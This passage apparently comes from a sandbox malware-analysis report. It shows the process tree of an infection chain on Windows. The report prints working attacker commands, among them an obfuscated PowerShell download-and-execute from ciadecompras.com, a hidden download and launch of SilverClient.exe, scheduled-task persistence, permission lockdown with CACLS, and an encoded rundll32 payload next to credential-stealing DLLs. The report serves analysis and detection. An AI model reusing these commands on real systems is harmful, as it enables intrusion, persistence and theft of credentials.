        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:4868
    - - C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4336
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1236
        6⤵
        Program crash
        
        PID:5340
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\Player3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\Player3.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3896
      - C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
        
        "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3552
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
        7⤵
        Creates scheduled task(s)
        
        PID:3200
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
        7⤵
        
        PID:4824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        8⤵
        
        PID:1252
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:N"
        8⤵
        
        PID:1716
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:R" /E
        8⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        8⤵
        
        PID:4928
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:N"
        8⤵
        
        PID:4892
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:R" /E
        8⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe" -h
        8⤵
        Executes dropped EXE
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\1000016001\pb1111.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000016001\pb1111.exe"
        7⤵
        Executes dropped EXE
        
        PID:3356
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:2256
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        8⤵
        Loads dropped DLL
        
        PID:3904
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3904 -s 680
        9⤵
        Program crash
        
        PID:3992
    - - C:\Users\Admin\AppData\Local\Temp\1000017001\40K.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000017001\40K.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4660
    - - C:\Users\Admin\AppData\Local\Temp\1000022001\Guf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000022001\Guf.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1388
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5228
    - - C:\Users\Admin\AppData\Local\Temp\1000028001\vlc-3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000028001\vlc-3.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4184
      - C:\Windows\System32\mshta.exe
        
        "C:\Windows\System32\mshta.exe" https://ciadecompras.com/stubs/Encoding.txt
        6⤵
        Blocklisted process makes network request
        Checks computer location settings
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://ciadecompras.com/stubs/Disable.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
        7⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
        8⤵
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3532
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        #cmd
        9⤵
        
        PID:204
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6E1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        10⤵
        
        PID:6124
        
        C:\Windows\system32\cmd.exe
        
        Cmd /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://ciadecompras.com/SilverClient.exe','C:\ProgramData\ice.exe');Start-Process 'C:\ProgramData\ice.exe'
        11⤵
        
        PID:6064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://ciadecompras.com/SilverClient.exe','C:\ProgramData\ice.exe');Start-Process 'C:\ProgramData\ice.exe'
        12⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:5684
        
        C:\ProgramData\ice.exe
        
        "C:\ProgramData\ice.exe"
        13⤵
        Executes dropped EXE
        
        PID:4292
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Programs"
        14⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1880
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Programs\svchost.exe"
        14⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5368
    - - C:\Users\Admin\AppData\Local\Temp\1000035001\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000035001\build.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Checks processor information in registry
        
        PID:1660
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000035001\build.exe" & exit
        6⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:4048
    - - C:\Users\Admin\AppData\Local\Temp\1000038001\Facebook_Tool_vip.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000038001\Facebook_Tool_vip.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5680
      - C:\Users\Admin\AppData\Local\Temp\1000038001\Facebook_Tool_vip.exe
        
        "{path}"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
    - - C:\Users\Admin\AppData\Local\Temp\1000040001\bg77.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000040001\bg77.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5904
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5212
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Users\Admin\AppData\Roaming\nsis_unse572172.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8E37AGkbADAAUQBv+wBUGwBjAHkAZvMARTsA8vEAAFlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKQ5Af+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B
        7⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        outlook_office_path
        
        PID:5004
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5004 -s 616
        8⤵
        Program crash
        
        PID:1528
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        outlook_win_path
        
        PID:5356
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:5476
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
      4⤵
      Loads dropped DLL
      PID:1408
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1408 -s 692
        5⤵
        Program crash
        
        PID:5816

C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
1⤵
- Executes dropped EXE
PID:3156

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:420

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2500

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:1516
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:3756
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 600
    3⤵
    - Program crash
    PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3756 -ip 3756
1⤵
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4032 -ip 4032
1⤵
PID:3348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa663a4f50,0x7ffa663a4f60,0x7ffa663a4f70
  2⤵
  PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1988 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:2
  2⤵
  PID:5160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
  2⤵
  PID:5292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
  2⤵
  PID:5488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
  2⤵
  PID:5480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:5584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5048 /prefetch:8
  2⤵
  PID:116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4812 /prefetch:8
  2⤵
  PID:4820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:4900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:8
  2⤵
  PID:6028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:8
  2⤵
  PID:6024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5672 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4068 /prefetch:8
  2⤵
  PID:5664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:8
  2⤵
  PID:4712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:8
  2⤵
  PID:4676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:8
  2⤵
  PID:3504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:8
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6572 /prefetch:8
  2⤵
  PID:3108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:3324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
  2⤵
  PID:5968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:6084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 /prefetch:8
  2⤵
  PID:5580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4964 /prefetch:8
  2⤵
  PID:5572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
  2⤵
  PID:5216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6584 /prefetch:8
  2⤵
  PID:6012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5376 /prefetch:8
  2⤵
  PID:5636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3524 /prefetch:8
  2⤵
  PID:5596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 /prefetch:8
  2⤵
  PID:6080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:8
  2⤵
  PID:612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1072 /prefetch:8
  2⤵
  PID:3100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 /prefetch:8
  2⤵
  PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2360 -ip 2360
1⤵
PID:3376

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4928

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4336 -ip 4336
1⤵
PID:848

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 552 -p 1408 -ip 1408
1⤵
PID:1452

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 5004 -ip 5004
1⤵
PID:2152

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5612

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
- Executes dropped EXE
PID:1228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 3904 -ip 3904
1⤵
PID:1528

C:\Users\Admin\Desktop\adwcleaner.exe
"C:\Users\Admin\Desktop\adwcleaner.exe"
1⤵
- Executes dropped EXE
